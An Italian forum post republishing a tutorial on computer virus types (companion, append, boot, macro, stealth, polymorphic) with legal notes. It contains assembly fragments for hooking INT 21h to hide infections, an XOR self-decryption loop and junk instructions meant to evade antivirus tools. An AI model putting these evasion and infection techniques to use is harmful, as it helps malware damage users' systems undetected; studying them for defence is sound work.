Riconoscere i tipi di Virus

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso

Riconoscere i tipi di Virus

Messaggio  Galvo96 il Dom Set 26, 2010 1:04 pm

Virus Informatici



Discaimer:

Non mi assumo alcuna responsabilita' per quanto riguarda il contenuto del
seguente file.

Gli esempi riportati e le spiegazioni sono esclusivamente per
fini didattici.

Nessuna responsabilita' potra' essere attribuita ne all'autore,nè al webmaster
per l'uso impoprio che altri potranno fare del seguente e delle informazioni
in esso contenute. Non mi assumo alcuna responsabilita' per eventuali danni
causati da uso proprio o improprio del seguente e delle informazioni in esso
contenute. Diffido chiunque dal compilare e/o eseguire i sorgenti contenuti
in questo testo. Essi sono puramente per scopi didattici.

L'autore e il webmaster, in breve,
non si assumono alcuna responsabilita'.

Contenuti:

1) Cos'e' un virus informatico ?
2) Proprieta' comuni
3) Classi dei virus
3.1) Virus Binari
3.1.1) Companion
3.1.2) Overwrite
3.1.3) Filling
3.1.4) Append
3.1.5) Boot
3.2) Virus Non Binari
3.2.1) Hoax
3.2.2) Macro
3.2.3) Exploit
4) Caratteristiche interessanti
4.1) Stealth
4.2) Encription
4.3) Polimorfico
4.4) Anti A.V.
5) Legislazione italiana in materia
6) Dopo la teoria...la pratica !



(0) Conoscenze necessarie per la comprensione del testo

Per meglio comprendere il testo e' necessaria una conoscenza basilare
dell'Assembly e di come funziona la gestione della memoria (segmenti,
offset). Sarebbe meglio conoscere gia' qualcosa dela programmazione sotto
MS-DOS visto che i programmi virus sono a *stretto contatto* con il
sistema operativo. Consiglio la lettura e la consultazione delle Ralph
Brown Interrupt List reperibili, tra l'altro, su Internet. Un manuale di
Assembly 8086 sarebbe l'ideale Wink durante la lettura del codice.

(1) Cos'e' un virus informatico

Analogamente ai virus biologici, un virus informatico e' un programma (un
programma !) che replica se stesso. Detto cosi' pero' non e' molto chiaro.
Sui libri specifici troverete le definizioni di virus che via via sono
nate che pero', coem tutte le definizioni, sono molto difficili da capire.
Facciamo un esempio per analogia: un virus biologico e' un "essere" che
attacca una cellula. Si replica DENTRO la cellula e manda il suo clone ad
attaccare un'altra cellula. Adesso pensiamo alle cellule come ai nostri
file eseguibili (non solo, poi vedremo perche') e al virus come ad un
virus informatico. Tuttavia esiste una radicale differenza: il virus per
agire deve essere eseguito. Infatti un virus informatico e' del tutto
simile ad un normale programma che contiene normalissime istruzioni per
la macchina ! Proprio per questo motivo e' impossibile, per la CPU,
riconoscere il codice di un virus. Tuttavia ci sono dei "segni distintivi"
che possono aiutare a riconoscerlo ma ne parleremo piu' avanti. Al momento
basti sapere che un virus (da qui' in poi per "virus" intendo virus
informatico) e' un programma e deve essere eseguito (non sempre vero, ma
poi speghero' xche).

(2) Proprieta' comuni dei virus

Un virus per essere tale deve fondamentalmente essere in gradi di
replicare se stesso. All'atto pratico, nella maggioranza dei casi, cio'
non e' sufficente. Infatti esso deve, per quanto possibile, deve seguire
le seguenti regole:

1) Essere invisibile
2) Non provocare errori che possano insospettire l'ignaro utente
3) Non occupare troppo tempo macchina
4) Non essere troppo grande

La regola 1 e' propria dei virus STEALTH, che con opportune
techiche che vedremo, riescono a nascondersi all'utente.
Proprio per le regole 3 e 4 e' preferibile scrivere i virus in
Assembly, che permette una miglior ottimizzazione del codice.

(3) Classi dei Virus

Di tipi di virus (o classi) ce ne sono diverse. Non tutti i virus si
comportano allo stesso modo, hanno le stesse caratterisiche, gli stessi
metodi di infezione,etc.
Ecco quindi un breve "struttura gerarchica" di distinsione per i virus:



Avverto il lettore che alcune classi non hanno i nomi che ho indicato:
questo xche alcune classi NON hanno un nome specifico Wink.

Partiamo ad analizzare l'albero dalla radice:

(3.1) VIRUS BINARI
Con la dicitura "Virus Binari" mi riferisco a tutti i virus scritti in un
linguaggio di programmazione (generalmente Assembly o anche C) e
compilati. I Virus Binari sono percui dei veri e propri programmi da
eseguire in linguaggio macchina.

(3.1.1) COMPANION
I virus Companion sono dei virus strani: essi si replicano senza
danneggiare alcun file ma utilizzano una tecnica propria del MS-DOS.
La priorita' di esecuzione dei file sotto MS-DOS e':
1) .BAT
2) .COM
3) .EXE
I virus Companion utilizzano prorpio questa caratteristica, ovvero se noi
abbiamo in una directory X un file chiamato X.EXE, il virus copia se
stesso in un file X.COM cosicche' se noi eseguiamo 'X' lanciamo il .COM
ovvero il virus ! Naturalmente all'interno del virus ci saranno delle
routine specifiche per eseguire anche X.EXE per evitare "sospetti". Ovvio
che il file X.COM e' spesso settato con l'attributi HIDDEN cosicche' con
un eventiale 'dir' non vediamo il nostro "amico" Wink.

(3.1.2) OVERWRITE
Questa classe di virus e' la piu' criticata: in pratica il nostro virus
sovrascrive in maniera irreversibile il file originale, andando contro la
regola 2. In pratica se X.EXE prima dell'infezione e' un "editor" dopo
l'infezione esso sara' solo il virus. Percui se dovete scrivere una
lettera e lanciate X nessun editor vi apparira' ! La domanda che un utente
si pone a questo punto e': "Perche' ?" ed e' cio' che bisogna evitare in
un virus. Proprio per questo non e' affatto consigliabile scrivere virus
di tipo OVERWRITE.

Prima dell'infezione:
X.EXE -> [CODICE DEL FILE X.EXE]
Size: 10345 Byte

Dopo l'infezione:
X.EXE -> [CODICE DEL VIRUS][PARTE RESTANTE DI X.EXE]
Size: n Bytes Size: 10345-n Bytes

solo che la parte restante non viene mai eseguita. L'unico vantaggio di
questo tipo di virus e' che la dimenzioen del file rimane, spesso,
invariata.

(3.1.3) FILLING
Questa classe e' a mio avviso la piu' affascinate di tutte. Un virus di
tipo FILLING e' spesso, per ragioni di sicurezza, anche APPEND. Poi
vedremo xche.
Questo tipo di virus, solitamente di dimensioni molto piccole, cerca nel
file da "infettare" uno spazio vuoto in cui nascondersi. Spesso infatti
nei programmi ci sono degli spazi vuoti usati in fase di esecuzione come
stack e non contenenti alcun dato utile. Il virus ci si copia dentro senza
che nessuno noti nulla: anche la dimensione del file ospite rimane
invariata. In fase di esecuzione,poi, viene eseguito prima il virus e poi
il programma originale. Ecco un esempio in ASM:

[file TEST.COM non infetto]
start: JUMP main

stack DB 100 DUP(00h)

main: NOP
[codice del programma]

una volta compilato il codice binario sara' qualcosa tipo:

[0000] E9 00 10 [un ipotetico JUMP a main:]
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
...
00 00 00 00 00 00 00 00
[0100] 90 [Mnemonico del NOP, prima istruzione di main:]

il virus si annida nei 100 bytes a 00 (ammesso che il virus sia grande <=
100Bytes) e dopo l'infezione il file TEST.COM sara':

N.B. XX sta' per codice del virus.

[0000] E9 00 01 (Ora JMP salta al codice del virus, sara' poi compito del
virus stesso di eseguire il codice originale)
XX XX XX XX XX XX XX XX
...
XX XX XX XX XX XX XX XX
[0100] 90 [Mnemonico del NOP, prima istruzione di main:]

in fase di esecuzione:

[ESEGUI CODICE DEL VIRUS]->[ESEGUI CODICE ORIGINALE]

cosi' l'utente non si accorge di nulla in quanto il programma funziona
ancora perfettamente perche'il virus ha usato lo spazio per i DATI e non
per il CODICE.

Un ipotetico diagramma di flusso di un file FILLING sara':

(START) -> APRO FILE -> CERCO n BYTES a 00h (che non corrispondono ad
alcun mnemonico e che sono, proprio per questo motivo, dati) -> COPIATI
DENTRO ALLO SPAZIO -> PRELEVA PUNTO DI ESCUZIONE ORIGINALE -> SCRIVI IL
TUO PUNTO DI ESECUZIONE -> (FINE)

(3.1.4) APPEND (Non Overwriting Virus)
Eccoci alla classe di virus piu' diffusa, quella APPEND. Questo
particolare tipo di virus si attacca al programma originale conservandone
le proprieta'. Funziona analogamente al tipo FILLING solo che questo tipo
si copia esclusivamente alla fine del file.

Non infetto:
TEST.COM [DATI E CODICE DI TEST.COM]
Size: n Bytes

Dopo l'Infezione:
TEST.COM [DATI E CODICE DI TEST.COM][DATI E CODICE DEL VIRUS]
Size: n + v_size Bytes

Come avrete notato si ha un aumento in dimensioni del file contrastando la
regola 1. Infatti un utente con un semplice 'DIR' puo' notare che il file
e' cresciuto Smile ed e' per questo che bisogna attenersi il piu' possibile
alla regola 4. C'e' anche una seconda soluzione: lo STEALTH di cui
parlero' piu' avanti.
Ecco un esempio di come funziona un virus APPEND (Non Overwriting Virus).


TEST.COM Originale Size: n Bytes

start: JUMP main
data DB 20 DUP(00)
main:
nop
nop
nop
int 20h [Fine del programma]


TEST.COM Infetto Size: n + virus_size Bytes

start: JUMP inizio_virus
data DB 20 DUP(00)
main:
nop
nop
nop
int 20h
inizio_virus:
[mi_faccio_i_cazzi_miei]
JUMP main

Come potete osservare per l'utente che esegueil programma infetto non
cambia assolutamente nulla: il codice del programma originale e' sempre
eseguito e siamo ok per la regola 2. Smile

Un ipotetico diagramma di flusso potrebbe essere il seguente:
(START)->MI COPIO ALLA FINE DEL FILE OSPITE->GUARDO IL SUO PUNTO DI INIZIO
ESECUZIONE->ME LO ANNOTO->SCRIVO IL MIO PUNTO DI ESECUZIONE->(FINE)

In fase di esecuzione il virus, alla fine dei suoi lavori, fa' un JUMP al
programma originale et voila' ! Il gioco e' fatto ! Wink

(3.1.5) BOOT Virus
Adesso parlo, per correttezza, della calsse di virus che in passato ha
causato piu' danni. Adesso nessuno scrive piu' simili virus ma e' giusto
sapere che anche loro esistono. Famosissimo di questa classe e'il
Virus Michelangelo:

; Virus Name: Michelangelo
; V Status: Common
; Discovered: April, 1991
; Symptoms: Disk directory damage; hard disk format; decrease in total
; system and available memory
; Origin: Sweden or the Netherlands
; Eff Length: N/A
; Type Code: BRtX - Resident Floppy Boot Sector/Master Boot Sector Infector
; This is a disassembly of the much-hyped michelangelo virus.
; As you can see, it is a derivative of the Stoned virus. The
; junk bytes at the end of the file are probably throwbacks to
; the Stoned virus. In any case, it is yet another boot sector
; and partition table infector.

Il loro principio di funzionamento e' semplice: un tempo gli HD costavano
molto e i CD manco si conoscevano. I Floppy-disk erano molto comuni e si
usavano spesso come System Disk. All'avvio del computer (ancora oggi e'
cosi) il BIOS cerca se un dischetto nel floppy-drive e' presente. Se c'e'
esso carica ed esegue il primo settore che dovrebbe contenere il
Bootstrap Loader (ovvero lanciare il sistema, come nei dischi di ripistino
di Windoze). Il Bootstrap Loader e' un programma "particolare" che viene
eseguito come un qualsiasi altro programma.
Esempio tratto dal Terror2 Virus:

boot_start:
db 0E9h <<
db 9Dh << QUESTI 3 BYTES SONO IL JUMP A str_end:
db 00h <<
db "TERROR2" << ETICHETTA DEL DISCO
str_boot:
db " << The Terror II Virus >> ",13,10
db "PolyMorphic Stealth Boot Virus.",13,10
db " Created by Dark Monk.",13,10
db " '' Fuck MS-DOS ! ,, ",13,10
str_end:
db 29 DUP (90h) ; Scrivi 30 NOP
mov ax,0001h ; 320 * 200
int 10h ; Video
mov ah,0Fh
int 10h
...

Il settore di BOOT ha una specie di HEADER che serve al BIOS per capire
che dischetto e'. Al momento non ne ho le specifiche sotto mano ma
comunque in rete ci sono, cercate ! Wink
Allora cosa succede ?
Inserisci il dischetto nel drive, accendi il PC, il BIOS carica il codice
della traccia 0 e lo esegue....e se e' un virus ? Se e' un virus esso ha
il controllo della macchina. Certo, sono necessari accorgimenti
particolari: primo fra tutti e' che il settore e' 512 Bytes, di cui circa
400 utilizzabili percui un virus, prima di tutto, carichera' il suo corpo
principale in memoria e lo eseguira'. In pratica nel settore di BOOT non
c'e' il VIRUS ma il LOADER del VIRUS. Il VIRUS vero e proprio si occupera'
poi di ripistinare, in modo da seguire le regole 1 e 2, il vero boot
record e di eseguirlo. Ci sono varie tecniche che non ho voglia di
illustrarvi, semmai in un secondo momento.

(3.2) VIRUS NON BINARI

I Virus Non Binari (molti mi criticheranno ma non importa) sono quelle
cose che per replicarsi non devono essere, necessariamente, eseguite.
Una annotazione a parte per i virus "EXPLOIT": questo tipo di virus si
basa su errori di un particolare programma. Mi riferisco, in questo caso,
a Microsoft Outlook Express che i n una versione, in particolari
condizioni, eseguiva un file in ATTACH senza il permesso e/o la richiesta
dell'utente. Ovvio che un ipotetico file in ATTACH poteva infettare un
sistema semplicemente inviandolo tramite E-Mail. Wink
In generale i VIRUS NON BINARI sono quei virus non il linguaggio macchina.

(3.2.1) HOAX

Gli HOAX (Bufale) sono una nuova classe di virus apparsa su Internet e
diffusa grazie alla 'lameraggine' degli utenti. Ho gia detto che un virus,
per essere tale, deve replicare se stesso. Per questa proprieta'
fondamentale, un qualsiasi messaggio che riporti una dicitura del tipo:

SE INVII QUESTO MESSAGGIO AD ALTRE 5 PERSONE VINCERAI 1 MILIONE DI LIRE !

i piu' boccaloni invieranno subito, senz esitare, questo messaggio ad
altre 5 persone provocando una crescita del "virus" di ragione 5 ovvero:

START
|
+-----+-----+-----+-----+
| | | | |
+++++ +++++ +++++ +++++ +++++
||||| ||||| ||||| ||||| |||||

etc... quindi in 2 passaggi si hanno gia' 5*5 copie del messaggio creando
una vera e propria infezione Wink. In 100 passaggi si hanno ben 5^100
messaggi causando uno SPAM di dimensioni enormi !

(3.2.2) MACRO VIRUS
I Macro Virus sono nati grazie ad una fatale caratteristica dei prodotti
Microsoft Office. Per velocizzare alcune operazioni frequenti e' possibile
creare delle Macro (chi programma sa' cosa sono) per velocizzare queste
operazioni. Nelle macro di MS Office e' possibile specificare di tutto:
apertura dei file, cancellazione, formattazione, etc..Una delle cose che
non permettono, per fortuna,e' la ripartizione del disco (ref. Melissa
Virus). Immaginatevi percui se invio ad un mio amico un documento .doc con
una macro (le macro sono dento i documenti !) con l'ordine di cancellare
tutto l'HD ! Fortunatamente i Macro Virus sono diffusi solo su sistemi
Microsoft, e piu' che virus sembrano vendette !!! Wink))

(3.2.3) EXPLOIT VIRUS
Come gia' accennato nell'introduzione, gli EXPLOIT virus sfruttano delle
particolari proprieta' dei Sistemi Operativi per diffondersi. Anche i
VERMI di Internet utilizzano questa caratteristica ma non sono virus
percui non ne parlo Smile. Il piu' famoso e' stato quello relativo ad Outlook
Express che, se inviavi un file infetto in ATTACH con un nuone piu' lungo
di 255 caratteri si provocava un Buffer Overflow con conseguente
esecuzione del codice del file in ATTACH.

[E-MAIL+ATTACH]->[OUTLOOK EXPRESS]->[BUFFER OVERFLOW & CRASH]->[ESEGUI
ATTACH]

Se ATTACH e' un virus appositamente progettato, ci ritroviamo con il
sistema infetto.

Non aggiungo altro all'argomento anche xche non sono molto ferrato sulla
questione.

(4) CARATTERISTICHE INTERESSANTI
In questo paragrafo parlero' di alcune caratteristiche interessanti dei
virus binari. Inaftti solo maneggiando il codice a livello macchina e'
possibile agire in modo cosi' profondo nel sistema.

(4.1) STEALTH
I virus stealth sono tra i piu' pericolosi. Analogamente all'F117
(Quell'aereo caccia-bombardiere stealth) i virus stealth sono "invisibili"
e cercano in ogni modo di coprirele proprie tracce. Per riuscirci
utilizzano delle caratteristiche base del sistema. Per esempio un virus
Dir Stealth (cheriesce a non far notare l'incremento di dimensione di un
file con il comando 'dir') si basa sul fatto che il COMMAND.COM,
all'arrivo di un 'dir' esegue un certo comnado sull'INT 21h (Interrupt 21h)
e ne visualizza la risposta. Il nostro virus, di conseguenza, cerchera' di
modificare la risposta. Ma come ?

Ecco uns asemplice rappresentazione dell atabella degli interrupt in un
sistema *sano*:

[DOS] -> [INT 01h] -> Routine Int 01h -> Ret
[INT 02h] -> Routine Int 02h -> Ret
[INT ...] -> Routine Int ... -> Ret
[INT 21h] -> Routine Int 21h -> Ret

N.B. 'Ret' significa "ritorno al chiamante, o al DOS".

ed adesso in un sistema inefftato da uno *pseudo* virus steath (e non
solo):

[DOS] -> [INT 01h] -> Routine Int 01h -> Ret
[INT 02h] -> Routine Int 02h -> Ret
[INT ...] -> Routine Int ... -> Ret
[INT 21h] -> Virus -> Routine Int 21h -> Virus -> Ret

Come vediamo il nostro virus *filtra* le chiamate in ingresso ed in
uscita. Se esso rileva una chiamata di 'dir' (poi entrero' nei
particolari) chiama l'INT 21h originale e ne attende la risposta, indi
modifica il risultato in modo che l'utente non noti nulla e ritorna al
chiamante. Il chiamante, ovviamente, non si accorge di nulla.
Per capire come funziona il modo di intercettazione delle chiamate di
Interrupt bisogna capire cosa sono gli Interrupt !
Ecco com'e' strutturata la tabella degli interrupt locata nella posizione
0000:0000 (Segmento 0 Offset 0) della memoria di sistema:

Offs | 4b | 4b |
-----+----+----+
0000 OffA SegA
0004 OffB SegB
0008 OffC SegC
...

In pratica chiamando l'INT 00 faccio una Call assoluta all'indirizzo
SegA:OffA. Con l'INT 01 a SegB:OffB e cosi' via. Per accedere ad un
elemento della tabella di interrupt basta scrivere queste righe:

xor ax,ax
mov es,ax ; ES = AX = 0
mov bx,word ptr es:[4*21h+0] ; OffSet
mov ax,word ptr es:[4*21h+2] ; Segmento
mov word ptr ds:[INT21h],bx ; Offset
mov word ptr ds:[INT21h[2]],ax ; Segmento
cli ; Disabilita INT

*** ADESSO METTO NEL VETTORE IL PUNTATORE ALLA NOSTRA ROUTINE:

mov word ptr es:[4*21h+0],offset newint21h ; OffSet della routine
mov word ptr es:[4*21h+2],ds ; Segmento della routine
sti ; Riabilita INT

Per semplicita' basta pensare che un Interrupt e' una Call ad una routine
particolare. Ecco una breve lista delle funzioni comuni dei primi
interrupt:

INT 00 - CPU-generated - DIVIDE ERROR
INT 01 - CPU-generated - SINGLE STEP; (80386+) - DEBUGGING EXCEPTIONS
INT 02 - external hardware - NON-MASKABLE INTERRUPT
INT 03 - CPU-generated - BREAKPOINT
INT 04 - CPU-generated - INTO DETECTED OVERFLOW
INT 05 - PRINT SCREEN; CPU-generated (80186+) - BOUND RANGE EXCEEDED
INT 06 - CPU-generated (80286+) - INVALID OPCODE
INT 07 - CPU-generated (80286+) - PROCESSOR EXTENSION NOT AVAILABLE
INT 08 - IRQ0 - SYSTEM TIMER; CPU-generated (80286+)
INT 09 - IRQ1 - KEYBOARD DATA READY; CPU-generated (80286,80386)
INT 0A - IRQ2 - LPT2/EGA,VGA/IRQ9; CPU-generated (80286+)
INT 0B - IRQ3 - SERIAL COMMUNICATIONS (COM2); CPU-generated (80286+)
INT 0C - IRQ4 - SERIAL COMMUNICATIONS (COM1); CPU-generated (80286+)
INT 0D - IRQ5 - FIXED DISK/LPT2/reserved; CPU-generated (80286+)
INT 0E - IRQ6 - DISKETTE CONTROLLER; CPU-generated (80386+)
INT 0F - IRQ7 - PARALLEL PRINTER
INT 10 - VIDEO; CPU-generated (80286+)
INT 11 - BIOS - GET EQUIPMENT LIST; CPU-generated (80486+)
INT 12 - BIOS - GET MEMORY SIZE
INT 13 - DISK
INT 14 - SERIAL
INT 15 - CASSETTE
INT 16 - KEYBOARD
INT 17 - PRINTER
INT 18 - DISKLESS BOOT HOOK (START CASSETTE BASIC)
INT 19 - SYSTEM - BOOTSTRAP LOADER
INT 1A - TIME
INT 1B - KEYBOARD - CONTROL-BREAK HANDLER
INT 1C - TIME - SYSTEM TIMER TICK
INT 1D - SYSTEM DATA - VIDEO PARAMETER TABLES
INT 1E - SYSTEM DATA - DISKETTE PARAMETERS
INT 1F - SYSTEM DATA - 8x8 GRAPHICS FONT
INT 20 - DOS 1+ - TERMINATE PROGRAM
INT 21 - DOS 1+ - Function Calls
INT 22 - DOS 1+ - PROGRAM TERMINATION ADDRESS
INT 23 - DOS 1+ - CONTROL-C/CONTROL-BREAK HANDLER
INT 24 - DOS 1+ - CRITICAL ERROR HANDLER
INT 25 - DOS 1+ - ABSOLUTE DISK READ
INT 26 - DOS 1+ - ABSOLUTE DISK WRITE
INT 27 - DOS 1+ - TERMINATE AND STAY RESIDENT
INT 28 - DOS 2+ - DOS IDLE INTERRUPT
INT 29 - DOS 2+ - FAST CONSOLE OUTPUT

Naturalmente 'newint21h' e' un puntatore alla nostra routine, alla routine
del virus:

INT21H dd ?

newint21h proc far
Assume CS:CODE_SEG, DS:Nothing
cmp ah,4Bh ; Load and Execute ?
je load_execute
cmp ah,11h ; Find First Matching File (Dir Stealth)
je dir_stealth
cmp ah,12h ; Find Next Matching File (Dir Stealth)
je dir_stealth
cmp ax,4300h ; Get File Attributes
je load_execute
cmp ax,4301h ; Set File Attributes
je load_execute
cmp ah,3Dh ; Open File
je load_execute
cmp ah,4Eh ; Find First Matching File (Dir Stealth)
je newdir_stealth
cmp ah,4Fh ; Find First Matching File (Dir Stealth)
je newdir_stealth
jmp do_int_now


Ecco, per capire questa parte di codice e' opportuno addentrarsi ancora di
piu' nelle chiamate di sistema:
L'interrupt 21h *contiene* tutte le chiamate importanti del nostro MS-DOS.
Consultando le RalphBrown Interrupt List si vede che l'INT2h e' quello che
conta piu' funzioni di tutti gli altri Int. Analizziamole qualcuna:

AH | AL | Altri Dati | Funzione
---+----+------------------+----------
00 CS = PSP Segment Termina un programma
01 Ret Ritorna un carattere letto da console
02 DL = Char Stampa il carattere in DL nella console
0F DS:DX -> FCB Apre un file usando FCB
10 DS:DX -> FCB Chiude un file aperto con FCB
11 DS:DX -> FCB Cerca primo file usando FCB
12 DS:DX -> FCB Trova prossimo file usando FCB
13 DS:DX -> FCB Cancella file usando FCB
14 DS:DX -> FCB Sequential read from FCB
1A DS:DX -> DTA Set Disk Area Transfer address
25 XX DS:DX -> New Int Setta il vettore dell'INT XX con New Int

comunque ce ne sono veramente tante. Vale la pena cercare su Internet le
Ralph Brown Interrupt list e dargli uno sguardo: sono affascinanti.
Non e' scopo di questo documento insegnarvi a scrivere virusma di imparare
a conoscerli percui non mi addentrero' nei possibili utilizzi delle
chiamate ne sui dettagli tecnici. Spero che abbiate compreso cosa sono gli
Interrupt, come si usano e a cosa servono.

Comunque di funzioni "stealthabili" ce ne sono molte, dipende solo da cosa
modifica il vostro virus ! Smile
Per concludere questo affascinante argomento eccovi un breve diagramma di
flusso di una procedura DIR STEALTH:

(INIZIO) --> <FIND FIRST ?> -Yes->[Chiama INT21h originale]--+
| | |
+-No--> <FIND NEXT ?> -Yes-+ <File Infetto ?>
| | |
(FINE)<---------------No-+ |
^--[Modifica risultati]<--Yes-+

Il diagramma non e' realizzato nel migliore dei modi: comunque sia la
procedura si riassume nel controllare se un file "chiamato a rapporto" e'
infetto, se SI modificarlo e poi restituire i dati.

(4.2) ENCRIPTION

Questa curiosa ed interessante caratteristica ha fatto si' che gli Anti
Virus avessero un "problemuccio" in piu'. Infatti con questa
carateristica, spesso, i 'Pattern Matching AV' fallivano. Questa tecnica
consiste di rendere un virus invisibile crittandone i contenuti.
Ovviamente deve rimanere inalterata quella parte di codice che permette la
successiva decrittazione e proprio questo gli rende facilmente
intercettabili. Tuttavia vale la pena vedere come funziona. Le tecniche
per la codifica/decodifica sono infinite, anche se per semplicita' e
velocita' (ricordate regole 3 e 4 ?) sono preferite quelle simmetrice con
lo XOR. Guardiamoci la tabella della verita' di una funzione XOR:

A | B | O
---+---+--- ___
0 0 0 A -\ \
1 0 1 | >-- O
0 1 1 B -/___/
1 1 0

Immaginiamoci questo dato: 00010010 da codificare con XOR con questa
chiave: 01100110

00010010 XOR
01100110
-----------
01110100

adesso proviamo a "codificare" il isultato (01110100) con la stessa chiave
(01100110):

01110100 XOR
01100110
---------
00010010

Magia ! Wink Come vedete il risultato e' assolutamente il dato originale
(00010010) ed ecco xche la funzione XOR e' chiamata simmetrica: con due
codifiche successive si ottiene il risutato iniziale.
Ecco che allora la routine di codifica/decodifica e' la stessa.
Ma in dettaglio come funziona un virus crittato ?

[INIZIO VIRUS]
start_enc:
[ROTUINES_VARIE_DEL_VIRUS]
end_enc:
[CRIPT_DECRIPT_ROUTINE]

noi crittiamo solo il codice tra start_enc e end_enc in quanto un codice
macchina crittato non e' piu' esegubile ! Ecco che allora , al monento
dell'esecuzione, dobbiamo prima richiamare la funzione
CRIPT_DECRIPT_ROUTINE per rendere il virus esegubile. Il problema sta' nel
fatto che la CRIPT_DECRIPT_ROUTINE non e' codificabile e quindi rilevabile
dagli antivirus.
Ecco la procedura di codifica/decodifica:

; Enc-Decryption Routine
lea si,(Key + bp)
mov bx,ds:[si] ; BX = Key
lea si,(encrypt_start + bp) ; SI = Start of encrypted part
mov cx,((offset encrypt_end - offset encrypt_start)/2)+1 ; CX Size
dec_loop:
mov ax,word ptr ds:[si] ; 16-Bit simple XOR encryption
xor ah,bl
xor al,bh
mov word ptr ds:[si],ax
inc si
inc si
loop dec_loop

Avremo percui su DISCO il virus in questa forma:

[INIZIO]
[CODICE VIRUS CRITATTO]
[ROUTINE EN-DEC]

e in memoria (in esecuzione) questa:

[INIZIO]
[CODICE VIRUS IN CHIARO]
[ROUTINE EN_DEC]

Esiste anche una semplice tecnica,chaiamta Polymophic Encryption, che
permette di cambiare chiave ad ogni generazione del virus. La chiave,
ovviamente, dovra' essere memorizzata all'interno del suo corpo. Comunque
il principio di funzionamento e' lo stesso.

(4.3) POLIMORFICI

Questa categoria e' spesso insieme alla precedente. I virus puramente
Polimorfici sono rari e comunque il polimorfismo non e' alla portata di
tutti: costruire un motore polimorfico (cosi' si chiama quel pezzo di
codiche che "polimorfizza" il virus) e' molto difficile. Come funziona in
dettaglio un virus polimorfico ? Bene, prima di tutto pensiamo a quanti
metodi ci sono per fare una cosa.
Esempio: per mettere 0 in AX quanti modi ci sono ? Proviamo...

1) MOV AX,0
2) XOR AX,AX
3) SUB AX,AX
4) MOV BX,0 MOV AX,BX
...

diciamo pure *infiniti* Smile Ed e' su questo che si basa un virus
polimorfico. In pratica se in un virus incontra l'istruzione MOV AX,0 esso
la sostituisce, a caso, con un suo simile. Cosi' un codice:

mov ax,0

puo' diventare:

xor ax,ax

oppure:

push bx
mov bx,0
mov ax,bx
pop bx

e in tutti questi casi il codice macchina corrispondente e' diverso cosa
x cui gli AntiVirus non ci capiscono piu' nulla Wink.

Uno dei piu' famosi motori polimorfici e' l' Mta (Mutation Engine) scritto
da Dark Avenger, un mitico virus-writer bulgaro.

(4.4) ANTI A.V.

Questa categoria di trucchi e'molto divertente da applicare.Lo scopo
principale e' fare in modo che l'AntiVirus non riconosca che quel codice
e' un virus Wink. I metodi per farlo sono molti e si basano essenzialmente
su alcune "pecche" degli AV. Sulla rivista specializzata VLAD ci sono
moltissime tecniche ben descrite.
Eccovi un esempio di come "tentare" utilizzando delle Garbage Instruction
(istruzioni spazzatura):

get_offs:
pop bp
inc ax ; << Garbage Instruction (confuse AV)
sub bp,offset get_offs ; In BP offset
; Check if encrypt
mov si,ds:[34h] ; << Garbage Instruction (confuse AV)
lea si,(encrypt_start + bp)
xchg di,si ; << Garbage Instruction (confuse AV)
xchg di,si ; << Garbage Instruction (confuse AV)
cmp byte ptr cs:[si],90h ; Encrypted ?
je encrypt_start ; Seems to be not Very Happy
; Decryption Routine
lea si,(Key + bp)
add si,2 ; << Garbage Instruction (confuse AV)
xchg bx,si ; << Garbage Instruction (confuse AV)
dec bx ; << Garbage Instruction (confuse AV)
xchg bx,si ; << Garbage Instruction (confuse AV)
mov bx,ds:[si] ; BX = Key
lea si,(encrypt_start + bp) ; SI = Start of encrypted part
mov cx,((offset encrypt_end - offset encrypt_start)/2)+1 ; CX Size
dec_loop:
mov ax,word ptr ds:[si] ; 16-Bit simple XOR encryption
int 03h ; << Garbage Instruction (confuse AV)
xor ah,bl
int 03h ; << Garbage Instruction (confuse AV)
xor al,bh
mov word ptr ds:[si],ax
inc si
int 03h ; << Garbage Instruction (confuse AV)
inc si
loop dec_loop

Le righe commentate con "Garbage Instruction..." si riferiscono ad
istruzioni *dummy* che rendono insensato (o,perlomeno, ci provano !) il
codice confondendo l'AntiVirus. Con questa metodologia si va' contro la
regola 4 ma bisogna cercare di trovare un buon compromesso tra difese e
offese.

(5) LEGISLAZIONE ITALIANA IN MATERIA DI VIRUS

(Grazie a Ferry Byte per le seguenti informazioni)

Carlo Sarzana di S. Ippolito, presidente aggiunto della sezione Gip del
Tribunale di Roma, nella sua relazione presentata al convegno sulla
criminalita' informatica tenutosi a Milano il 26 maggio 1994 rispetto alla
legge Conso (l. n. 547/93 pubblicata in Gazzetta Ufficiale n. 305
30.12.93) sui reati informatici osservava che:
1) con riguardo all'art. 615 ter., che punisce l'accesso abusivo a u
sistema informatico o telematico, la tutela e' limitata ai sistemi
informatici o telematici protetti da misure di sicurezza perche',
dovendosi tutelare il diritto di un soggetto specifico, e' necessario
che quest'ultimo abbia dimostrato, con la predisposizione di mezzi di
protezione sia logica che fisica, di voler espressamente riservare
l'accesso e la permanenza nel sistema alle sole persone da lui
autorizzate;
2) in riferimento all'art. 615 quater che punisce l'abusiva acquisizione e
diffusione di codici di accesso a sistemi informatici o telematici,
viene definito che, per la configurabilita' del delitto, e' richiesto il
dolo specifico, consistente nel fine di procurare un profitto a se' o ad
altri o di arrecare ad altri un danno;
3) a proposito dei virus (articolo 615-quinques) non commette reato colui
che per ragioni di studio o predisposizione di sistemi di prevenzione,
raccolga e/o custodisce programmi virus.

Art. 615-quinquies - (Diffusione di programmi diretti a danneggiare o
interrompere un sistema informatico). - Chiunque diffonde, comunica o
consegna un programma informatico da lui stesso o da altri redatto, avente
per scopo o per effetto il danneggiamento di un sistema informatico o
telematico, dei dati o dei programmi in esso contenuti o ad essi
pertinenti, ovvero l'interruzione, totale o parziale, o l'alterazione del
suo funzionamento, e' punito con la reclusione sino a due anni e con la
multa sino a lire venti milioni".

Come vedete la legislazione in materia e' piuttosto vaga ed imprecisa,
sarebbe punibile anche la Microsoft per il "DEL" e il "DELTREE" Wink)
Del resto conviene non rischiare: la costituzione dice che la legge e'
uguale per tutti, ma e' proprio cosi' ?

BREVE INTERLUDIO

Adesso la parte "teorica" (se cosi' si puo' definire) e' finita. Segue
l'analisi di un vero virus informatico. Traetene spunto per verificare le
nozioni acquisite. Ricordate sempre: un vero virus-writer non compie mai
danni sul sistema altrui. Questo e' un invito esplicito a non scrivere
virus pericolosi o distruttivi. Coscenza vostra. Smile

(6) DOPO LA TEORIA...LA PRATICA !

